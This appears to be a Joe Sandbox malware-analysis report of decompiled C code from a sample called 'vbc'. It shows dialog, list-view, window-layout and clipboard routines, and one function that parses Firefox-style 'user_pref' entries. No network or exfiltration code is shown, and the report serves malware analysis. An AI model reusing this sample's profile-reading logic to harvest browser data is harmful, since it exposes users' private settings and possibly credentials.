                                                                                                                                                    					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
                                                                                                                                                    					E0040559F(_t155);
                                                                                                                                                    					goto L27;
                                                                                                                                                    				}
                                                                                                                                                    				_t101 = _t98 - 1;
                                                                                                                                                    				if(_t101 != 0) {
                                                                                                                                                    					goto L27;
                                                                                                                                                    				}
                                                                                                                                                    				_t126 = _a8 >> 0x10;
                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
                                                                                                                                                    					L7:
                                                                                                                                                    					if(_t126 != 0) {
                                                                                                                                                    						goto L27;
                                                                                                                                                    					}
                                                                                                                                                    					if(_a8 != 0x3f0) {
                                                                                                                                                    						L13:
                                                                                                                                                    						if(_a8 == 0x3eb) {
                                                                                                                                                    							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
                                                                                                                                                    						}
                                                                                                                                                    						if(_a8 == 0x3ec) {
                                                                                                                                                    							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
                                                                                                                                                    						}
                                                                                                                                                    						if(_a8 == 0x3ee) {
                                                                                                                                                    							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
                                                                                                                                                    						}
                                                                                                                                                    						if(_a8 == 0x3ef) {
                                                                                                                                                    							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
                                                                                                                                                    						}
                                                                                                                                                    						if(_a8 == 2) {
                                                                                                                                                    							EndDialog( *(_t155 + 4), 2);
                                                                                                                                                    						}
                                                                                                                                                    						if(_a8 == 1) {
                                                                                                                                                    							E00405538(_t155);
                                                                                                                                                    							EndDialog( *(_t155 + 4), 1);
                                                                                                                                                    						}
                                                                                                                                                    						_t75 = 1;
                                                                                                                                                    						goto L28;
                                                                                                                                                    					}
                                                                                                                                                    					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
                                                                                                                                                    					_t129 = 0;
                                                                                                                                                    					if(_t128 <= 0) {
                                                                                                                                                    						L12:
                                                                                                                                                    						E0040559F(_t155);
                                                                                                                                                    						goto L13;
                                                                                                                                                    					}
                                                                                                                                                    					_t144 = 0;
                                                                                                                                                    					do {
                                                                                                                                                    						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
                                                                                                                                                    						 *(_t118 + 2) = _t129;
                                                                                                                                                    						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
                                                                                                                                                    						_t129 = _t129 + 1;
                                                                                                                                                    						_t144 = _t144 + 0x14;
                                                                                                                                                    						 *_t118 = _t153;
                                                                                                                                                    					} while (_t129 < _t128);
                                                                                                                                                    					goto L12;
                                                                                                                                                    				} else {
                                                                                                                                                    					if(_a8 != 0x3ed) {
                                                                                                                                                    						goto L27;
                                                                                                                                                    					} else {
                                                                                                                                                    						E004054C6(__ecx, __ecx);
                                                                                                                                                    						goto L7;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}
                                                                                                                                                    0x004057f5
                                                                                                                                                    0x00405800
                                                                                                                                                    0x00405806
                                                                                                                                                    0x00405812
                                                                                                                                                    0x00405819
                                                                                                                                                    0x00405819
                                                                                                                                                    0x00405820
                                                                                                                                                    0x00405822
                                                                                                                                                    0x0040582c
                                                                                                                                                    0x0040582c
                                                                                                                                                    0x00405830
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405830
                                                                                                                                                    0x00405776
                                                                                                                                                    0x00405779
                                                                                                                                                    0x0040577d
                                                                                                                                                    0x004057a0
                                                                                                                                                    0x004057a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004057a1
                                                                                                                                                    0x0040577f
                                                                                                                                                    0x00405781
                                                                                                                                                    0x00405786
                                                                                                                                                    0x00405789
                                                                                                                                                    0x00405790
                                                                                                                                                    0x00405795
                                                                                                                                                    0x00405796
                                                                                                                                                    0x0040579b
                                                                                                                                                    0x0040579b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405751
                                                                                                                                                    0x00405757
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040575d
                                                                                                                                                    0x0040575d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040575d
                                                                                                                                                    0x00405757

                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 004057BD
                                                                                                                                                    • GetDlgItem.USER32 ref: 004057D0
                                                                                                                                                    • GetDlgItem.USER32 ref: 004057E5
                                                                                                                                                    • GetDlgItem.USER32 ref: 004057FD
                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405819
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040582C
                                                                                                                                                      • Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
                                                                                                                                                      • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                                                                                                                      • Part of subcall function 004054C6: SendMessageA.USER32 ref: 00405505
                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$DialogMessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2485852401-0
                                                                                                                                                    • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                                                                                    • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                                                                                                                    • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                                                                                    • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                    			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
                                                                                                                                                    				RECT* _v8;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t39;
                                                                                                                                                    				signed int _t41;
                                                                                                                                                    				void* _t42;
                                                                                                                                                    				struct HWND__* _t47;
                                                                                                                                                    				signed int _t53;
                                                                                                                                                    				void* _t54;
                                                                                                                                                    				signed int _t76;
                                                                                                                                                    				signed int _t78;
                                                                                                                                                    				void* _t80;
                                                                                                                                                    				void** _t82;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				void* _t90;
                                                                                                                                                    				signed int _t91;
                                                                                                                                                    
                                                                                                                                                    				_t80 = __edi;
                                                                                                                                                    				_push(_t58);
                                                                                                                                                    				_push(0xc);
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				 *((intOrPtr*)(__edi + 0x10)) = __eax;
                                                                                                                                                    				L004115D0();
                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                    					_t82 = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					 *((intOrPtr*)(__eax)) = 0;
                                                                                                                                                    					_t82 = __eax;
                                                                                                                                                    				}
                                                                                                                                                    				 *(_t80 + 0xc) = _t82;
                                                                                                                                                    				_t39 =  *_t82;
                                                                                                                                                    				_t90 = _t39;
                                                                                                                                                    				if(_t90 != 0) {
                                                                                                                                                    					_push(_t39);
                                                                                                                                                    					L004115D6();
                                                                                                                                                    					 *_t82 = 0;
                                                                                                                                                    				}
                                                                                                                                                    				_t82[2] = _a8;
                                                                                                                                                    				_t41 = E004049FB(_a8);
                                                                                                                                                    				_t76 = 4;
                                                                                                                                                    				_t82[1] = _t41;
                                                                                                                                                    				_t42 = _t41 * _t76;
                                                                                                                                                    				_push( ~(0 | _t90 > 0x00000000) | _t42);
                                                                                                                                                    				L004115D0();
                                                                                                                                                    				 *_t82 = _t42;
                                                                                                                                                    				memset(_t42, 0, _t82[1] << 2);
                                                                                                                                                    				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                                                                                                                    				_t91 =  *(_t80 + 0x10);
                                                                                                                                                    				if(_t91 == 0) {
                                                                                                                                                    					_t86 = ( *(_t80 + 0xc))[1];
                                                                                                                                                    					_t78 = 0x14;
                                                                                                                                                    					_t53 = _t86 * _t78;
                                                                                                                                                    					_push( ~(0 | _t91 > 0x00000000) | _t53);
                                                                                                                                                    					L004115D0();
                                                                                                                                                    					 *(_t80 + 0x10) = _t53;
                                                                                                                                                    					if(_t86 > 0) {
                                                                                                                                                    						_t54 = 0;
                                                                                                                                                    						do {
                                                                                                                                                    							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
                                                                                                                                                    							_t54 = _t54 + 0x14;
                                                                                                                                                    							_t86 = _t86 - 1;
                                                                                                                                                    						} while (_t86 != 0);
                                                                                                                                                    					}
                                                                                                                                                    					_v8 = 1;
                                                                                                                                                    				}
                                                                                                                                                    				if(E00401540(0x448, _t80, _a4) == 1) {
                                                                                                                                                    					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                                                                                                                    					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
                                                                                                                                                    				}
                                                                                                                                                    				_t47 = SetFocus(_a8);
                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                    					_push( *(_t80 + 0x10));
                                                                                                                                                    					L004115D6();
                                                                                                                                                    				}
                                                                                                                                                    				return _t47;
                                                                                                                                                    			}

                                                                                                                                                    0x00405a14
                                                                                                                                                    0x00405a14
                                                                                                                                                    0x00405a2c
                                                                                                                                                    0x00405a34
                                                                                                                                                    0x00405a41
                                                                                                                                                    0x00405a41
                                                                                                                                                    0x00405a4a
                                                                                                                                                    0x00405a53
                                                                                                                                                    0x00405a55
                                                                                                                                                    0x00405a58
                                                                                                                                                    0x00405a5d
                                                                                                                                                    0x00405a61

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                    • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                                                                                    • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                                                                                                                    • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                                                                                    • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040A698(void* __esi) {
                                                                                                                                                    				struct HDWP__* _v8;
                                                                                                                                                    				int _v12;
                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                    				struct tagRECT _v32;
                                                                                                                                                    				struct tagRECT _v48;
                                                                                                                                                    				void* _t32;
                                                                                                                                                    				int _t60;
                                                                                                                                                    				int _t65;
                                                                                                                                                    
                                                                                                                                                    				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
                                                                                                                                                    					GetClientRect( *(__esi + 0x108),  &_v32);
                                                                                                                                                    					GetWindowRect( *(__esi + 0x114),  &_v48);
                                                                                                                                                    					_t65 = _v48.bottom - _v48.top + 1;
                                                                                                                                                    					GetWindowRect( *(__esi + 0x118),  &_v48);
                                                                                                                                                    					_v12 = _v32.right - _v32.left;
                                                                                                                                                    					_t60 = _v48.bottom - _v48.top + 1;
                                                                                                                                                    					_v16 = _v32.bottom - _v32.top;
                                                                                                                                                    					_v8 = BeginDeferWindowPos(3);
                                                                                                                                                    					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
                                                                                                                                                    					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
                                                                                                                                                    					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
                                                                                                                                                    					return EndDeferWindowPos(_v8);
                                                                                                                                                    				}
                                                                                                                                                    				return _t32;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32 ref: 0040A6B7
                                                                                                                                                    • GetWindowRect.USER32 ref: 0040A6CD
                                                                                                                                                    • GetWindowRect.USER32 ref: 0040A6E0
                                                                                                                                                    • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2126104762-0
                                                                                                                                                    • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                                                                                    • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                                                                                                                    • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                                                                                    • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E00406069(void* _a4) {
                                                                                                                                                    				signed int _t11;
                                                                                                                                                    				int _t13;
                                                                                                                                                    				void* _t17;
                                                                                                                                                    				signed int _t19;
                                                                                                                                                    				void* _t22;
                                                                                                                                                    
                                                                                                                                                    				_t22 = _a4;
                                                                                                                                                    				_t19 = 0;
                                                                                                                                                    				EmptyClipboard();
                                                                                                                                                    				if(_t22 != 0) {
                                                                                                                                                    					_t2 = strlen(_t22) + 1; // 0x1
                                                                                                                                                    					_t13 = _t2;
                                                                                                                                                    					_t17 = GlobalAlloc(0x2000, _t13);
                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                    						memcpy(GlobalLock(_t17), _t22, _t13);
                                                                                                                                                    						GlobalUnlock(_t17);
                                                                                                                                                    						_t11 = SetClipboardData(1, _t17);
                                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                                    						_t19 =  ~( ~_t11);
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				CloseClipboard();
                                                                                                                                                    				return _t19;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                                                                                                                    • strlen.MSVCRT ref: 0040607E
                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 0040609A
                                                                                                                                                    • memcpy.MSVCRT ref: 004060A3
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                                                                                                                    • SetClipboardData.USER32 ref: 004060B5
                                                                                                                                                    • CloseClipboard.USER32(?,?,0040AEA7,?), ref: 004060C5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3116012682-0
                                                                                                                                                    • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                                                                                    • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                                                                                                                    • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                                                                                    • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E0040C530(void* __eflags, intOrPtr* _a4) {
                                                                                                                                                    				int _v8;
                                                                                                                                                    				char _v12;
                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                    				void _v1029;
                                                                                                                                                    				void _v1039;
                                                                                                                                                    				char _v1040;
                                                                                                                                                    				void _v2063;
                                                                                                                                                    				void _v2064;
                                                                                                                                                    				void _v3087;
                                                                                                                                                    				void _v3088;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                    				void* _t54;
                                                                                                                                                    				void* _t56;
                                                                                                                                                    				void* _t59;
                                                                                                                                                    				void* _t60;
                                                                                                                                                    				void* _t67;
                                                                                                                                                    				void* _t68;
                                                                                                                                                    				void* _t73;
                                                                                                                                                    				void* _t85;
                                                                                                                                                    				int _t86;
                                                                                                                                                    				void* _t106;
                                                                                                                                                    				int _t107;
                                                                                                                                                    				int _t111;
                                                                                                                                                    				void* _t114;
                                                                                                                                                    				void* _t115;
                                                                                                                                                    				void* _t116;
                                                                                                                                                    
                                                                                                                                                    				_v1040 = 0;
                                                                                                                                                    				memset( &_v1039, 0, 0x3ff);
                                                                                                                                                    				_v3088 = 0;
                                                                                                                                                    				memset( &_v3087, 0, 0x3ff);
                                                                                                                                                    				_v2064 = 0;
                                                                                                                                                    				memset( &_v2063, 0, 0x3ff);
                                                                                                                                                    				_t116 = _t115 + 0x24;
                                                                                                                                                    				_t53 = E00406B74(_a4 + 4);
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v16 = _t53;
                                                                                                                                                    				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
                                                                                                                                                    				if(_t54 != 0) {
                                                                                                                                                    					do {
                                                                                                                                                    						_t56 = E004069D2(0, "user_pref(\"");
                                                                                                                                                    						_pop(_t92);
                                                                                                                                                    						if(_t56 != 0) {
                                                                                                                                                    							goto L10;
                                                                                                                                                    						}
                                                                                                                                                    						_push(0x412b10);
                                                                                                                                                    						_t60 = 0xb;
                                                                                                                                                    						_t14 = E004069D2(_t60) - 0xb; // -11
                                                                                                                                                    						_t92 = _t14;
                                                                                                                                                    						_v8 = _t92;
                                                                                                                                                    						if(_t92 <= 0) {
                                                                                                                                                    							goto L10;
                                                                                                                                                    						}
                                                                                                                                                    						_t85 = E004069D2(_t61 + 1, 0x412b18);
                                                                                                                                                    						_t17 = _t85 + 1; // 0x1
                                                                                                                                                    						_t106 = E004069D2(_t17, 0x412b10);
                                                                                                                                                    						if(_t106 <= 0) {
                                                                                                                                                    							_t28 = _t85 + 1; // 0x1
                                                                                                                                                    							_t67 = E004069D2(_t28, ")");
                                                                                                                                                    							_pop(_t92);
                                                                                                                                                    							_t68 = 0xfffffffe;
                                                                                                                                                    							_t111 = _t67 + _t68 - _t85;
                                                                                                                                                    							if(_t111 <= 0) {
                                                                                                                                                    								goto L10;
                                                                                                                                                    							}
                                                                                                                                                    							_t107 = _v8;
                                                                                                                                                    							memcpy( &_v3088,  &_v1029, _t107);
                                                                                                                                                    							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
                                                                                                                                                    							_t73 = _t114 + _t85 - 0x40a;
                                                                                                                                                    							L9:
                                                                                                                                                    							memcpy( &_v2064, _t73, _t111);
                                                                                                                                                    							_t92 = _a4;
                                                                                                                                                    							_t116 = _t116 + 0x18;
                                                                                                                                                    							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
                                                                                                                                                    							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
                                                                                                                                                    							if(_t59 == 0) {
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							goto L10;
                                                                                                                                                    						}
                                                                                                                                                    						_t20 = _t106 + 1; // 0x1
                                                                                                                                                    						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
                                                                                                                                                    						_pop(_t92);
                                                                                                                                                    						if(_t111 <= 0) {
                                                                                                                                                    							goto L10;
                                                                                                                                                    						}
                                                                                                                                                    						_t86 = _v8;
                                                                                                                                                    						memcpy( &_v3088,  &_v1029, _t86);
                                                                                                                                                    						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
                                                                                                                                                    						_t73 = _t114 + _t106 - 0x40b;
                                                                                                                                                    						goto L9;
                                                                                                                                                    						L10:
                                                                                                                                                    						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
                                                                                                                                                    					} while (_t59 != 0);
                                                                                                                                                    					return _t59;
                                                                                                                                                    				}
                                                                                                                                                    				return _t54;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                    • String ID: user_pref("
                                                                                                                                                    • API String ID: 765841271-2487180061
                                                                                                                                                    • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                                                                                    • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                                                                                                                    • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                                                                                    • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                    			E0040559F(intOrPtr _a4) {
                                                                                                                                                    				struct HWND__* _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				int _v20;
                                                                                                                                                    				int _v24;
                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                    				int _v48;
                                                                                                                                                    				char* _v52;
                                                                                                                                                    				void* _v64;
                                                                                                                                                    				void _v319;
                                                                                                                                                    				char _v320;
                                                                                                                                                    				struct HWND__* _t53;
                                                                                                                                                    				intOrPtr* _t59;
                                                                                                                                                    				void* _t61;
                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				void* _t80;
                                                                                                                                                    				intOrPtr _t81;
                                                                                                                                                    				void* _t84;
                                                                                                                                                    				intOrPtr _t89;
                                                                                                                                                    				short _t91;
                                                                                                                                                    				signed int _t94;
                                                                                                                                                    				short* _t95;
                                                                                                                                                    				void* _t96;
                                                                                                                                                    				void* _t97;
                                                                                                                                                    
                                                                                                                                                    				_t89 = _a4;
                                                                                                                                                     				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9); // control ID 0x3e9 (1001): the dialog's list-view control
                                                                                                                                                    				_v12 = _t53;
                                                                                                                                                     				SendMessageA(_t53, 0x1009, 0, 0); // LVM_DELETEALLITEMS
                                                                                                                                                     				SendMessageA(_v12, 0x1036, 0, 0x26); // LVM_SETEXTENDEDLISTVIEWSTYLE; 0x26 = LVS_EX_FULLROWSELECT | LVS_EX_CHECKBOXES | LVS_EX_SUBITEMIMAGES
                                                                                                                                                    				do {
                                                                                                                                                     				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0); // LVM_DELETECOLUMN until no columns remain
                                                                                                                                                    				_push(0xc8);
                                                                                                                                                    				_push(0);
                                                                                                                                                    				_push(0);
                                                                                                                                                    				_push(_v12);
                                                                                                                                                    				_t80 = 6;
                                                                                                                                                    				E00404925(0x412466, _t80);
                                                                                                                                                    				_t59 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                    				_t81 =  *((intOrPtr*)(_t59 + 4));
                                                                                                                                                    				_t97 = _t96 + 0x10;
                                                                                                                                                    				_v32 = _t81;
                                                                                                                                                    				_v28 =  *_t59;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				if(_t81 <= 0) {
                                                                                                                                                    					L10:
                                                                                                                                                    					_t61 = 2;
                                                                                                                                                    					E004048B6(_t61, _v12, 0, _t61);
                                                                                                                                                    					return SetFocus(_v12);
                                                                                                                                                    				} else {
                                                                                                                                                    					goto L3;
                                                                                                                                                    				}
                                                                                                                                                    				do {
                                                                                                                                                    					L3:
                                                                                                                                                    					_v16 = 0;
                                                                                                                                                    					_v24 = 0;
                                                                                                                                                    					do {
                                                                                                                                                    						_t94 = _v16 << 2;
                                                                                                                                                    						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
                                                                                                                                                    							_v320 = 0;
                                                                                                                                                    							memset( &_v319, 0, 0xff);
                                                                                                                                                    							_t97 = _t97 + 0xc;
                                                                                                                                                    							_v52 =  &_v320;
                                                                                                                                                     							_v64 = 4; // LVCOLUMN.mask = LVCF_TEXT
                                                                                                                                                     							_v48 = 0xff; // LVCOLUMN.cchTextMax; pszText = &_v320
                                                                                                                                                     							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) { // LVM_GETCOLUMNA: read header text of column _v16
                                                                                                                                                    								_push(_v16);
                                                                                                                                                    								_push(0);
                                                                                                                                                    								_push(_v12);
                                                                                                                                                    								_t84 = 5;
                                                                                                                                                    								_t74 = E0040496E( &_v320, _t84);
                                                                                                                                                    								_t95 = _t94 + _v28;
                                                                                                                                                    								_t91 =  *_t95;
                                                                                                                                                    								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
                                                                                                                                                    								_t97 = _t97 + 0x18;
                                                                                                                                                    								if(_t91 == 0) {
                                                                                                                                                    									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                    						_t66 = _v32;
                                                                                                                                                    						_v24 = _v24 + 0x14;
                                                                                                                                                    					} while (_v16 < _t66);
                                                                                                                                                    					_v20 = _v20 + 1;
                                                                                                                                                    				} while (_v20 < _t66);
                                                                                                                                                    				goto L10;
                                                                                                                                                    			}
                                                                                                                                                     Instruction addresses (listing column): 0x004055ab 0x004055b6 0x004055cc 0x004055cf 0x004055dc 0x004055de 0x004055ea 0x004055ee 0x004055f3 0x004055f4 0x004055f5 0x004055ff 0x00405600 0x00405605 0x00405608 0x0040560d 0x00405612 0x00405615 0x00405618 0x0040561b 0x004056f5 0x004056f7 0x004056fd 0x00405712 0x00000000 0x00000000 0x00000000 0x00405621 0x00405621 0x00405621 0x00405624 0x00405627 0x0040562d 0x00405638 0x0040564c 0x00405652 0x00405660 0x00405669 0x00405673 0x00405680 0x0040568b 0x0040568d 0x00405696 0x00405697 0x0040569c 0x0040569d 0x004056a5 0x004056a7 0x004056b9 0x004056be 0x004056c3 0x004056d3 0x004056d3 0x004056c3 0x0040568b 0x004056d6 0x004056d9 0x004056dc 0x004056e0 0x004056e9 0x004056ec 0x00000000
